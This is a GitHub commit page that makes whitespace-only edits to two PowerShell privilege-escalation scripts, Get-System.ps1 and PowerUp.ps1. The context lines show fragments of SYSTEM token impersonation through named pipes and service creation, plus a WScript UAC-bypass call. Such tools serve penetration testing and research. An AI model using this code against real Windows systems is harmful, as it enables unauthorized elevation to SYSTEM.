This repository was archived by the owner on Jan 21, 2021. It is now read-only.

Commit 9ed26d6

committed
removed whitespace
1 parent cf44439 commit 9ed26d6

2 files changed

+27
-25
lines changed

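--- a/Privesc/Get-System.ps1
+++ b/Privesc/Get-System.ps1
@@ -111,11 +111,11 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 Param
 (
 [OutputType([Type])]
-
+
 [Parameter( Position = 0)]
 [Type[]]
 $Parameters = (New-Object Type[](0)),
-
+
 [Parameter( Position = 1 )]
 [Type]
 $ReturnType = [Void]
@@ -130,7 +130,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
 $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
 $MethodBuilder.SetImplementationFlags('Runtime, Managed')
-
+
 Write-Output $TypeBuilder.CreateType()
 }
 
@@ -140,11 +140,11 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 Param
 (
 [OutputType([IntPtr])]
-
+
 [Parameter( Position = 0, Mandatory = $True )]
 [String]
 $Module,
-
+
 [Parameter( Position = 1, Mandatory = $True )]
 [String]
 $Procedure
@@ -161,7 +161,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
 $tmpPtr = New-Object IntPtr
 $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
-
+
 # Return the address of the function
 Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
 }
@@ -190,7 +190,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 $PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle()
 
 # Declare/setup all the needed API function
-# adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
+# adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
 $ImpersonateNamedPipeClientAddr = Get-ProcAddress Advapi32.dll ImpersonateNamedPipeClient
 $ImpersonateNamedPipeClientDelegate = Get-DelegateType @( [Int] ) ([Int])
 $ImpersonateNamedPipeClient = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateNamedPipeClientAddr, $ImpersonateNamedPipeClientDelegate)
@@ -202,11 +202,11 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 $OpenSCManagerAAddr = Get-ProcAddress Advapi32.dll OpenSCManagerA
 $OpenSCManagerADelegate = Get-DelegateType @( [String], [String], [Int]) ([IntPtr])
 $OpenSCManagerA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenSCManagerAAddr, $OpenSCManagerADelegate)
-
+
 $OpenServiceAAddr = Get-ProcAddress Advapi32.dll OpenServiceA
 $OpenServiceADelegate = Get-DelegateType @( [IntPtr], [String], [Int]) ([IntPtr])
 $OpenServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenServiceAAddr, $OpenServiceADelegate)
-
+
 $CreateServiceAAddr = Get-ProcAddress Advapi32.dll CreateServiceA
 $CreateServiceADelegate = Get-DelegateType @( [IntPtr], [String], [String], [Int], [Int], [Int], [Int], [String], [String], [Int], [Int], [Int], [Int]) ([IntPtr])
 $CreateServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateServiceAAddr, $CreateServiceADelegate)
@@ -298,8 +298,8 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 else{
 Write-Verbose '[Get-System] Service successfully deleted'
 }
-
-# Step 7 - CloseServiceHandle() for the service handle
+
+# Step 7 - CloseServiceHandle() for the service handle
 Write-Verbose '[Get-System] Closing the service handle'
 $val = $CloseServiceHandle.Invoke($ServiceHandle)
 Write-Verbose '[Get-System] Service handle closed off'
@@ -458,15 +458,15 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 @([IntPtr], [Bool], $TokPriv1LuidStruct.MakeByRefType(),[Int32], [IntPtr], [IntPtr]),
 [Runtime.InteropServices.CallingConvention]::Winapi,
 'Auto').SetCustomAttribute($AttribBuilder)
-
+
 $Win32Methods = $Win32TypeBuilder.CreateType()
 
 $Win32Native = [Int32].Assembly.GetTypes() | Where-Object {$_.Name -eq 'Win32Native'}
 $GetCurrentProcess = $Win32Native.GetMethod(
 'GetCurrentProcess',
 [Reflection.BindingFlags] 'NonPublic, Static'
 )
-
+
 $SE_PRIVILEGE_ENABLED = 0x00000002
 $STANDARD_RIGHTS_REQUIRED = 0x000F0000
 # $STANDARD_RIGHTS_READ = 0x00020000
@@ -509,7 +509,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 if(-not($RetVal)) {
 Write-Error "[Get-System] AdjustTokenPrivileges failed, RetVal : $RetVal" -ErrorAction Stop
 }
-
+
 $LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value
 
 $SystemHandle = Get-WmiObject -Class Win32_Process | ForEach-Object {
@@ -532,10 +532,10 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 Write-Verbose "[Get-System] error enumerating handle: $_"
 }
 } | Where-Object {$_ -and ($_ -ne 0)} | Select-Object -First 1
-
+
 if ((-not $SystemHandle) -or ($SystemHandle -eq 0)) {
 Write-Error '[Get-System] Unable to obtain a handle to a system process.'
-}
+}
 else {
 [IntPtr]$SystemToken = [IntPtr]::Zero
 $RetVal = $Win32Methods::OpenProcessToken(([IntPtr][Int] $SystemHandle), ($TOKEN_IMPERSONATE -bor $TOKEN_DUPLICATE), [ref]$SystemToken);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()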

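--- a/Privesc/PowerUp.ps1
+++ b/Privesc/PowerUp.ps1
@@ -1,11 +1,13 @@
 <#
-PowerUp aims to be a clearinghouse of common Windows privilege escalation
-vectors that rely on misconfigurations. See README.md for more information.
 
-Author: @harmj0y
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerUp aims to be a clearinghouse of common Windows privilege escalation
+vectors that rely on misconfigurations. See README.md for more information.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
 #>
 
 #Requires -Version 2
@@ -851,7 +853,7 @@ a modifiable path.
 }
 else {
 # if the path doesn't exist, check if the parent folder allows for modification
-$ParentPath = Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue
+$ParentPath = Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue
 if ($ParentPath -and (Test-Path -Path $ParentPath)) {
 $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path
 }
@@ -4480,7 +4482,7 @@ https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptByp
 Param(
 [String]
 $sSource,
-
+
 [String]
 $sTarget
 )
@@ -4638,7 +4640,7 @@ https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptByp
 Invoke-WscriptElevate
 }
 }
-else {
+else {
 Write-Warning '[!] Target machine is not vulnerable.'
 }
 }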
